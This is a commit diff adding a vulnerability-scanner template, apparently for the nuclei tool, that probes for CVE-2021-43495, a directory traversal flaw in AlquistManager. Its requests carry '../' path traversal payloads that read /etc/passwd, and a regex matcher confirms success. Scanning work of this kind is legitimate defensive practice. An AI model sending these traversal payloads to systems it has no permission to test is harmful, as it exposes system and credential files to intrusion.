Create CVE-2021-43495.yaml

cves/2021/CVE-2021-43495.yaml

@@ -0,0 +1,23 @@
+id: CVE-2021-43495
+
+info:
+  name: AlquistManager lfi
+  author: pikpikcu
+  severity: high
+  description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py
+  tags: cve,cve2021,lfi,alquist
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43495
+    - https://github.com/AlquistManager/alquist/issues/43
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/asd/../../../../../../../../etc/passwd"
+      - "{{BaseURL}}:5000/asd/../../../../../../../../etc/passwd"
+ 
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body